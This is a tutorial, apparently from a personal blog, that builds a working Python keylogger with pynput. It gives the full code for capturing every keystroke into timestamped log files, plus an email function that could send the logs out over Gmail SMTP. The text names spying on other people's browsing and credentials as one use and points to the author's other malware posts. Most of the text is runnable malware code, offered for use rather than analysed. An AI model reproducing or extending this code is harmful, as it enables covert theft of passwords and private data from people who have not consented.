Keylogger is a simple yet effective program that can monitor a person’s keyboard activities. It can be used to spy on a person’s data (browsing activities, user credentials, etc.) or to monitor children activities.
It can be designed to store all keystrokes activities in a local log file or can be sent via email depending on how it is designed.
In this tutorial, we will see how to write a simple keylogger in python so that we understand the underlying theme of how it works. If you are interested to write other types of malwares, you can look into my previous posts:
First, we need to install the module pynput. This module is used to control and monitor
$ pip install pynput
Now, for our simple program, we import the following modules
from pynput.keyboard import Key, Listener import logging import os from datetime import datetime
Writing a Keylogger Class
Let’s create a keylogger class that contains all the methods we need to perform keylogger activities.
First, we need to create a directory that will contain our log files. We create a subdirectory named
log in the current directory (from where we are running the script) if does not exist.
class Keylogger: def create_log_directory(self): sub_dir = "log" cwd = os.getcwd() self.log_dir = os.path.join(cwd,sub_dir) if not os.path.exists(sub_dir): os.mkdir(sub_dir)
Next we create a static method that returns key information if a key is pressed. We need this function for later use.
@staticmethod def on_press(key): try: logging.info(str(key)) except Exception as e: logging.info(e)
Finally, we need to report the keystroke information in a file. We create a text file and name with the current time as a prefix so that the program creates a new file each time it is run with a new filename. Also, we need to configure how we want the information to be stored in the log file using
logging.basicConfig format. And then we use the
Listener method to track keystroke information where we pass our previous static method as a callback.
def write_log_file(self): # time format example: '2021-05-29-171747' time = str(datetime.now())[:-7].replace(" ", "-").replace(":", "") # logging info in the file logging.basicConfig( filename=(os.path.join(self.log_dir, time) + "log.txt"), level=logging.DEBUG, format= '[%(asctime)s]: %(message)s', ) with Listener(on_press=self.on_press) as listener: listener.join()
Running the Script
Let’s create the main function where we create an object of the
Keylogger class, and then call the methods one after another.
if __name__ == "__main__": klog = Keylogger() klog.create_log_directory() klog.write_log_file()
Note that, while writing the code, I could avoid creating a class and use the methods as basic python functions. However, it is better to use classes so that you can add other functionalities when you need in the future.
Now, run the script from the terminal and check the created log files.
$ python keylogger.py
The whole is available here.
You can add more functionalities, for example sending the logs via email or the log file as email attachments.
def send_mail(self, email, password, TO, msg): with smtplib.SMTP("smtp.gmail.com", 587) as server: try: server.starttls() # enable secure TLS mode server.login(email, password) server.sendmail(email, TO, msg) except Exception as e: pass finally: server.quit()
I will post details on how to send message via email or send an attachment with email in a seperate post.
That’s it! Thanks for being with me. Cheers!